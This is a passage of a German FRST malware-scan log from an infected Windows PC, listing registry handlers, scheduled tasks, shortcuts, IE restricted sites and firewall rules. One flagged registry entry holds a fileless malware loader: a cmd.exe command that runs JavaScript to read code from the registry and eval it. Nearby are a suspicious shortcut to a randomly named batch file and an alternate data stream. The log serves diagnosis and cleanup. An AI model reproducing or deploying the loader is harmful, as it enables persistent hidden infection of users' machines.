(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

CustomCLSID: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes\CLSID\{005A3A96-BAC4-4B0A-94EA-C0CE100EA736}\localserver32 -> C:\Users\*****\AppData\Roaming\Dropbox\bin\Dropbox.exe (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes\CLSID\{144DF3B2-2402-47AE-9583-5A045929A8D4}\InprocServer32 -> C:\Users\*****\AppData\Local\Google\Update\1.3.33.5\psuser_64.dll (Google Inc.)
CustomCLSID: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes\CLSID\{A03A51A2-5B59-4ECE-96D1-037F7F2A0D8F}\localserver32 -> C:\Users\*****\AppData\Local\SkypePlugin\7.29.0.73\GatewayVersion-x64.exe (Skype Technologies S.A.)
CustomCLSID: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes\CLSID\{CBF9CD8C-2714-4F36-B76A-43E6C7547BC2}\localserver32 -> C:\Users\*****\AppData\Local\SkypePlugin\7.29.0.73\EdgeCalling.exe (Skype Technologies S.A.)
CustomCLSID: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes\CLSID\{E8CF3E55-F919-49D9-ABC0-948E6CB34B9F}\InprocServer32 -> C:\Users\*****\AppData\Local\Google\Update\1.3.33.5\psuser_64.dll (Google Inc.)
CustomCLSID: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes\CLSID\{ECD97DE5-3C8F-4ACB-AEEE-CCAB78F7711C}\InprocServer32 -> C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.18.0.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes\CLSID\{FB314ED9-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.18.0.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes\CLSID\{FB314EDA-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.18.0.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes\CLSID\{FB314EDB-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.18.0.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes\CLSID\{FB314EDC-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.18.0.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes\CLSID\{FB314EDD-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.18.0.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes\CLSID\{FB314EDE-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.18.0.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes\CLSID\{FB314EDF-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.18.0.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes\CLSID\{FB314EE0-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.18.0.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes\CLSID\{FB314EE1-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.18.0.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes\CLSID\{FB314EE2-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.18.0.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes\CLSID\{FBC9D74C-AF55-4309-9FB2-C426E071637F}\InprocServer32 -> C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.18.0.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes\CLSID\{FE0A3EA9-4DDA-4B0A-9981-5ABE8F0186CD}\InprocServer32 -> C:\Users\*****\AppData\Local\SkypePlugin\7.29.0.73\GatewayActiveX-x64.dll (Skype Technologies S.A.)
HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\Software\Classes\uwas: cmd.exe /c start "" "C:\Users\*****\AppData\Local\Wqy He\xfoqedfutx.hnen" "javascript:np5aj="n";j6Q0=new ActiveXObject("WScript.Shell");CJH0m="XMmT";Ku05Ci=j6Q0.RegRead("HKCU\\software\\lyndd\\jupmxfqiju");JQo0Sr="6SpeO0";eval(Ku05Ci);dYlGfd3="bB6tEkG";" <==== ACHTUNG
ShellIconOverlayIdentifiers: ["DropboxExt1"] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.18.0.dll [2017-08-08] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: ["DropboxExt2"] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.18.0.dll [2017-08-08] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: ["DropboxExt3"] -> {FB314EDD-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.18.0.dll [2017-08-08] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: ["DropboxExt4"] -> {FB314EDE-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.18.0.dll [2017-08-08] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: ["DropboxExt5"] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.18.0.dll [2017-08-08] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: ["DropboxExt6"] -> {FB314EDF-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.18.0.dll [2017-08-08] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: ["DropboxExt7"] -> {FB314EDC-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.18.0.dll [2017-08-08] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: ["DropboxExt8"] -> {FB314EE0-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.18.0.dll [2017-08-08] (Dropbox, Inc.)
ContextMenuHandlers1: [IObitUnstaler] -> {B19ED566-D419-470b-B111-3C89040BC027} =>  -> Keine Datei
ContextMenuHandlers1-x32: [MyPhoneExplorer] -> {A372C6DF-7A85-41B1-B3B0-D1E24073DCBF} => G:\Program Files (x86)\MyPhoneExplorer\DLL\ShellMgr.dll [2010-03-30] (F.J. Wechselberger)
ContextMenuHandlers1-x32: [PDFCreator.ShellContextMenu] -> {d9cea52e-100d-4159-89ea-76e845bc13e1} =>  -> Keine Datei
ContextMenuHandlers4: [IObitUnstaler] -> {B19ED566-D419-470b-B111-3C89040BC027} =>  -> Keine Datei
ContextMenuHandlers5: [NvCplDesktopContext] -> {3D1975AF-48C6-4f8e-A182-BE0E08FA86A9} => C:\WINDOWS\system32\nvshext.dll [2017-07-19] (NVIDIA Corporation)
ContextMenuHandlers6: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} =>  -> Keine Datei
ContextMenuHandlers6: [IObitUnstaler] -> {B19ED566-D419-470b-B111-3C89040BC027} =>  -> Keine Datei
ContextMenuHandlers1_S-1-5-21-1566530412-1856523912-1524002813-1001: [DropboxExt] -> {ECD97DE5-3C8F-4ACB-AEEE-CCAB78F7711C} => C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.18.0.dll [2017-08-08] (Dropbox, Inc.)
ContextMenuHandlers4_S-1-5-21-1566530412-1856523912-1524002813-1001: [DropboxExt] -> {ECD97DE5-3C8F-4ACB-AEEE-CCAB78F7711C} => C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.18.0.dll [2017-08-08] (Dropbox, Inc.)
ContextMenuHandlers5_S-1-5-21-1566530412-1856523912-1524002813-1001: [DropboxExt] -> {ECD97DE5-3C8F-4ACB-AEEE-CCAB78F7711C} => C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.18.0.dll [2017-08-08] (Dropbox, Inc.)

==================== Geplante Aufgaben (Nicht auf der Ausnahmeliste) =============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

Task: {0317339D-827C-47F3-91C4-7324B9D0FA87} - System32\Tasks\{A380CFB5-96EE-4AD0-A8F5-D66D9C86A514} => C:\WINDOWS\system32\pcalua.exe -a "G:\Program Files (x86)\PurpleHills\The Treasures of Mystery Island 3 - Das Geisterschiff\The Treasures of Mystery Island - Das Geisterschiff.exe" -d "G:\Program Files (x86)\PurpleHills\The Treasures of Mystery Island 3 - Das Geisterschiff"
Task: {057EAF51-6043-4A2C-8C62-FA5066DFA7DE} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> Keine Datei <==== ACHTUNG
Task: {189B4981-5161-4573-95FB-914ABF5857A2} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> Keine Datei <==== ACHTUNG
Task: {1B266482-966D-4C9C-A722-E1BEFB5D28B0} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2017-08-01] (Google Inc.)
Task: {2BFDCC5F-5F70-4BDA-8D57-85BB365542CA} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> Keine Datei <==== ACHTUNG
Task: {2C71CB98-75B2-4838-9B99-8BB2257CEC5B} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> Keine Datei <==== ACHTUNG
Task: {352E6CA0-7314-4DF4-89C4-682368D80D57} - System32\Tasks\Microsoft\Windows\Workplace Join\Automatic-Workplace-Join => C:\WINDOWS\System32\AutoWorkplace.exe
Task: {3BD02220-2F87-42CC-B767-EECC4E9F9601} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1566530412-1856523912-1524002813-1001UA => C:\Users\*****\AppData\Local\Google\Update\GoogleUpdate.exe [2016-05-08] (Google Inc.)
Task: {3C37C677-69CD-441A-8D47-EEB67B7220B5} - System32\Tasks\NvDriverUpdateCheckDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [2017-07-26] (NVIDIA Corporation)
Task: {41006DFD-D327-4048-9208-BB616205BF64} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> Keine Datei <==== ACHTUNG
Task: {43681C05-5E15-43E2-93BB-8585D47F91E4} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> Keine Datei <==== ACHTUNG
Task: {46ECB298-DE9D-4F8C-A5C9-75A7C20EFE1F} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2017-06-30] (Piriform Ltd)
Task: {4C001B95-7BB8-481D-BBD9-D9E3DEF59DFE} - System32\Tasks\NvTmMon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmMon.exe [2017-07-26] (NVIDIA Corporation)
Task: {50222EEB-D09E-4AF2-A9C7-16E8BA809C5C} - System32\Tasks\Microsoft\Windows\RemovalTools\MRT_HB => C:\WINDOWS\system32\MRT.exe [2017-08-08] (Microsoft Corporation)
Task: {54193568-FA18-42AA-AA36-72AE0A69F1CE} - \Microsoft\Windows\Setup\GWXTriggers\Telemetry-4xd -> Keine Datei <==== ACHTUNG
Task: {5695EF73-2130-43FB-B248-51C430A387A4} - System32\Tasks\NvProfileUpdaterDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [2017-07-26] (NVIDIA Corporation)
Task: {5DA81636-2ECE-4830-AE1B-077999FE28A7} - System32\Tasks\DropboxUpdateTaskUserS-1-5-21-1566530412-1856523912-1524002813-1001UA1d23700db892b60 => C:\Users\*****\AppData\Local\Dropbox\Update\DropboxUpdate.exe [2016-11-05] (Dropbox, Inc.)
Task: {64670950-29B6-4622-AFED-B1C8B63CBDAB} - System32\Tasks\NvTmRepOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmRep.exe [2017-07-26] (NVIDIA Corporation)
Task: {6A99B42D-8E1B-44BD-87EB-FD3F84C0DCFC} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1566530412-1856523912-1524002813-1001Core => C:\Users\*****\AppData\Local\Google\Update\GoogleUpdate.exe [2016-05-08] (Google Inc.)
Task: {749258DE-50AA-45E3-A106-4D57EA1939D4} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> Keine Datei <==== ACHTUNG
Task: {96B4A76A-E0A9-497A-B6C0-43AC09DF5333} - System32\Tasks\NvTmRep_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmRep.exe [2017-07-26] (NVIDIA Corporation)
Task: {98644CA8-C542-4436-AFE3-3272F8AD1B07} - System32\Tasks\DropboxUpdateTaskUserS-1-5-21-1566530412-1856523912-1524002813-1001Core => C:\Users\*****\AppData\Local\Dropbox\Update\DropboxUpdate.exe [2016-11-05] (Dropbox, Inc.)
Task: {A1DC91F7-197C-4208-AE19-8D4190EB04A4} - System32\Tasks\NvNodeLauncher_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\NvNode\nvnodejslauncher.exe [2017-07-26] (NVIDIA Corporation)
Task: {A36A36C9-7C2C-4BAB-8C32-209FE107A789} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2017-08-01] (Google Inc.)
Task: {A6E3E460-B5D2-4349-BC82-DDCD409BC7D5} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> Keine Datei <==== ACHTUNG
Task: {AAFBDA33-C21C-4668-9CAF-14B06F45FC3D} - System32\Tasks\NvProfileUpdaterOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [2017-07-26] (NVIDIA Corporation)
Task: {B5B3C199-8D05-4D87-98CE-C413AAFB8290} - System32\Tasks\NVIDIA GeForce Experience SelfUpdate_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\NVIDIA GeForce Experience\NVIDIA GeForce Experience.exe [2017-07-26] (NVIDIA Corporation)
Task: {B75DE4BB-2CA4-4515-85EA-0B346AAB0160} - System32\Tasks\DropboxUpdateTaskUserS-1-5-21-1566530412-1856523912-1524002813-1001UA => C:\Users\*****\AppData\Local\Dropbox\Update\DropboxUpdate.exe [2016-11-05] (Dropbox, Inc.)
Task: {B918F1B1-79A9-45D6-8195-051607EF371D} - System32\Tasks\DropboxUpdateTaskUserS-1-5-21-1566530412-1856523912-1524002813-1001Core1d23700db7c7e10 => C:\Users\*****\AppData\Local\Dropbox\Update\DropboxUpdate.exe [2016-11-05] (Dropbox, Inc.)
Task: {C1A8AE88-41C5-4E46-BD3E-B0C94C9179A9} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1566530412-1856523912-1524002813-1001UA1d25a61a78c34b7 => C:\Users\*****\AppData\Local\Google\Update\GoogleUpdate.exe [2016-05-08] (Google Inc.)
Task: {D2EEA344-C1E2-4667-98B9-3F9655F456C6} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1566530412-1856523912-1524002813-1001Core1d25a61a7879fb6 => C:\Users\*****\AppData\Local\Google\Update\GoogleUpdate.exe [2016-05-08] (Google Inc.)
Task: {DB66428E-B85F-4EDD-BC33-43CAA577BBCA} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> Keine Datei <==== ACHTUNG
Task: {FDC309C3-7CAB-43AD-8822-78E3C63B88B4} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> Keine Datei <==== ACHTUNG

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Aufgabe verschoben. Die Datei, die durch die Aufgabe gestartet wird, wird nicht verschoben.)

Task: C:\WINDOWS\Tasks\CreateExplorerShellUnelevatedTask.job => C:\WINDOWS\explorer.exe
Task: C:\WINDOWS\Tasks\DropboxUpdateTaskUserS-1-5-21-1566530412-1856523912-1524002813-1001Core1d23700db7c7e10.job => C:\Users\*****\AppData\Local\Dropbox\Update\DropboxUpdate.exe
Task: C:\WINDOWS\Tasks\DropboxUpdateTaskUserS-1-5-21-1566530412-1856523912-1524002813-1001UA1d23700db892b60.job => C:\Users\*****\AppData\Local\Dropbox\Update\DropboxUpdate.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskUserS-1-5-21-1566530412-1856523912-1524002813-1001Core.job => C:\Users\*****\AppData\Local\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskUserS-1-5-21-1566530412-1856523912-1524002813-1001UA.job => C:\Users\*****\AppData\Local\Google\Update\GoogleUpdate.exe

==================== Verknüpfungen & WMI ========================

(Die Einträge können gelistet werden, um sie zurückzusetzen oder zu entfernen.)


Shortcut: C:\Users\*****\AppData\Local\Rvurcez\bdobyjg.lnk -> C:\Users\*****\AppData\Local\Bizpiwcinu\arvikxihn.bat ()

==================== Geladene Module (Nicht auf der Ausnahmeliste) ==============

2017-03-18 22:58 - 2017-03-18 22:58 - 000138000 _____ () C:\WINDOWS\SYSTEM32\inputhost.dll
2017-03-18 22:59 - 2017-03-20 06:36 - 001731072 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll
2017-07-18 00:26 - 2017-07-18 00:26 - 000074752 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.19.820.0_x64__kzf8qxf38zg5c\SkypeHost.exe
2017-07-18 00:26 - 2017-07-18 00:26 - 000203264 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.19.820.0_x64__kzf8qxf38zg5c\SkypeBackgroundTasks.dll
2017-07-18 00:26 - 2017-07-18 00:26 - 043573248 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.19.820.0_x64__kzf8qxf38zg5c\SkyWrap.dll
2017-07-18 00:26 - 2017-07-18 00:26 - 002435584 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.19.820.0_x64__kzf8qxf38zg5c\skypert.dll
2017-06-30 13:22 - 2017-06-30 13:22 - 000069632 _____ () C:\Program Files\CCleaner\lang\lang-1031.dll
2016-09-29 12:59 - 2017-07-26 19:09 - 001267136 _____ () C:\Program Files\NVIDIA Corporation\NvContainer\libprotobuf.dll
2017-07-31 20:55 - 2017-04-18 19:01 - 002493440 _____ () G:\Program Files (x86)\Origin\libGLESv2.dll
2017-06-20 11:28 - 2017-06-20 11:28 - 001997792 ____R () C:\Program Files (x86)\Skype\Phone\skypert.dll

==================== Alternate Data Streams (Nicht auf der Ausnahmeliste) =========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird nur der ADS entfernt.)

AlternateDataStreams: C:\ProgramData\TEMP:CB0AACC9 [135]

==================== Abgesicherter Modus (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Der Wert "AlternateShell" wird wiederhergestellt.)


==================== Verknüpfungen (Nicht auf der Ausnahmeliste) ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt.)


==================== Internet Explorer Vertrauenswürdig/Eingeschränkt ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt.)

IE restricted site: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\008i.com -> 008i.com
IE restricted site: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\008k.com -> 008k.com
IE restricted site: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\00hq.com -> 00hq.com
IE restricted site: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\0190-dialers.com -> 0190-dialers.com
IE restricted site: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\01i.info -> 01i.info
IE restricted site: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\02pmnzy5eo29bfk4.com -> 02pmnzy5eo29bfk4.com
IE restricted site: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\05p.com -> 05p.com
IE restricted site: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\07ic5do2myz3vzpk.com -> 07ic5do2myz3vzpk.com
IE restricted site: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\08nigbmwk43i01y6.com -> 08nigbmwk43i01y6.com
IE restricted site: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\093qpeuqpmz6ebfa.com -> 093qpeuqpmz6ebfa.com
IE restricted site: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\0calories.net -> 0calories.net
IE restricted site: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\0cj.net -> 0cj.net
IE restricted site: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\0scan.com -> 0scan.com
IE restricted site: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\1-britney-spears-nude.com -> 1-britney-spears-nude.com
IE restricted site: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\1-domains-registrations.com -> 1-domains-registrations.com
IE restricted site: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\1-se.com -> 1-se.com
IE restricted site: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\1001movie.com -> 1001movie.com
IE restricted site: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\1001night.biz -> 1001night.biz
IE restricted site: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\100gal.net -> 100gal.net
IE restricted site: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\100sexlinks.com -> 100sexlinks.com

Da befinden sich 4789 mehr Seiten.


==================== Hosts Inhalt: ===============================

(Wenn benötigt kann der Hosts: Schalter in die Fixlist aufgenommen werden um die Hosts Datei zurückzusetzen.)

2013-08-22 15:25 - 2013-08-22 15:25 - 000000824 _____ C:\WINDOWS\system32\Drivers\etc\hosts


==================== Andere Bereiche ============================

(Aktuell gibt es keinen automatisierten Fix für diesen Bereich.)

HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\*****\AppData\Local\Microsoft\Windows\Themes\RoamedThemeFiles\DesktopBackground\fantasy.jpg
DNS Servers: 62.2.24.162 - 62.2.17.61
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall ist aktiviert.

==================== MSCONFIG/TASK MANAGER Deaktivierte Einträge ==

MSCONFIG\Services: PDF Architect 5 Manager => 2
HKLM\...\StartupApproved\StartupFolder: => "UE Music Library-Taskleisten-Tool.lnk"
HKLM\...\StartupApproved\StartupFolder: => "simplicheck.lnk"
HKLM\...\StartupApproved\Run32: => "UpdReg"
HKLM\...\StartupApproved\Run32: => "Raptr"
HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\StartupApproved\StartupFolder: => "Dropbox.lnk"
HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\StartupApproved\Run: => "BingSvc"

==================== Firewall Regeln (Nicht auf der Ausnahmeliste) ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

FirewallRules: [{A48CA470-A870-4179-B1B2-4E1B515CF8CC}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\XCOM 2\Binaries\Win64\Launcher\ModLauncherWPF.exe
FirewallRules: [{15C73935-9422-4FF2-8044-5909C2A58895}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\XCOM 2\Binaries\Win64\Launcher\ModLauncherWPF.exe
FirewallRules: [UDP Query User{9EE745C2-5DD7-43D6-AC1A-F4CB56837C77}C:\program files\logitech gaming software\lcore.exe] => (Allow) C:\program files\logitech gaming software\lcore.exe
FirewallRules: [TCP Query User{7CDC35E1-0481-4B34-B7A2-07A7BF9EA6B4}C:\program files\logitech gaming software\lcore.exe] => (Allow) C:\program files\logitech gaming software\lcore.exe
FirewallRules: [UDP Query User{02439386-6E1B-4B1A-85CE-2BAEDC630B7D}G:\program files (x86)\myphoneexplorer\myphoneexplorer.exe] => (Allow) G:\program files (x86)\myphoneexplorer\myphoneexplorer.exe
FirewallRules: [TCP Query User{21237B05-7282-4B4E-A1B9-166036A3F782}G:\program files (x86)\myphoneexplorer\myphoneexplorer.exe] => (Allow) G:\program files (x86)\myphoneexplorer\myphoneexplorer.exe
FirewallRules: [UDP Query User{DF239A90-3015-4A02-9683-656B9FF43E4E}G:\program files (x86)\steam\steamapps\common\eve online\sharedcache\tq\bin\exefile.exe] => (Allow) G:\program files (x86)\steam\steamapps\common\eve online\sharedcache\tq\bin\exefile.exe
FirewallRules: [TCP Query User{ACCBBD61-2F9E-4EB0-85D4-5BA97DE3FBCF}G:\program files (x86)\steam\steamapps\common\eve online\sharedcache\tq\bin\exefile.exe] => (Allow) G:\program files (x86)\steam\steamapps\common\eve online\sharedcache\tq\bin\exefile.exe
FirewallRules: [{0D1B9AD2-C22B-49E0-A70F-ACB9065E4C01}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Eve Online\eve.exe
FirewallRules: [{E0EEBF19-98E6-42DE-BFD5-648FE1CAC4EA}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Eve Online\eve.exe
FirewallRules: [UDP Query User{A99BD097-FB9C-4197-B13A-5C40B5146AE9}G:\program files (x86)\steam\steamapps\common\total war warhammer\warhammer.exe] => (Allow) G:\program files (x86)\steam\steamapps\common\total war warhammer\warhammer.exe
FirewallRules: [TCP Query User{2AAE67D8-35FC-4732-ACEC-7220F4914FE7}G:\program files (x86)\steam\steamapps\common\total war warhammer\warhammer.exe] => (Allow) G:\program files (x86)\steam\steamapps\common\total war warhammer\warhammer.exe
FirewallRules: [UDP Query User{E7165155-1031-43E7-9F56-B39F3081C3FC}F:\program files (x86)\forhonor\forhonor.exe] => (Allow) F:\program files (x86)\forhonor\forhonor.exe
FirewallRules: [TCP Query User{015D5357-1B6C-4BB6-8E04-A92E4DEE27D8}F:\program files (x86)\forhonor\forhonor.exe] => (Allow) F:\program files (x86)\forhonor\forhonor.exe
FirewallRules: [{9D819DCB-2F2A-4F0C-8B4E-BAF745DDCDAA}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Galactic Civilizations III\StardockLauncher.exe
FirewallRules: [{6AD5DAF0-AD0C-4397-80FB-784D39972676}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Galactic Civilizations III\StardockLauncher.exe
FirewallRules: [{BC6EB3F3-2A98-46F0-9150-BCC21E2A56E7}] => (Allow) G:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe
FirewallRules: [{F69BB511-8722-4AC1-826A-17EF9DF0BC0E}] => (Allow) G:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe
FirewallRules: [{B4593F94-2FA0-4595-B476-E2B14AA8F5C2}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Tyranny\Tyranny.exe
FirewallRules: [{4C81C009-BCAE-43D4-9498-8EAE2B0A4C6A}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Tyranny\Tyranny.exe
FirewallRules: [{310A94E6-73AC-4ED9-B2FC-0B186AB40DE6}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
FirewallRules: [{B32AAF55-10AB-4914-B9AE-52159DE5512C}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Warhammer End Times Vermintide\binaries\vermintide.exe
FirewallRules: [{B09ADEED-B680-4B72-900B-77D2C4F2650F}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Warhammer End Times Vermintide\binaries\vermintide.exe
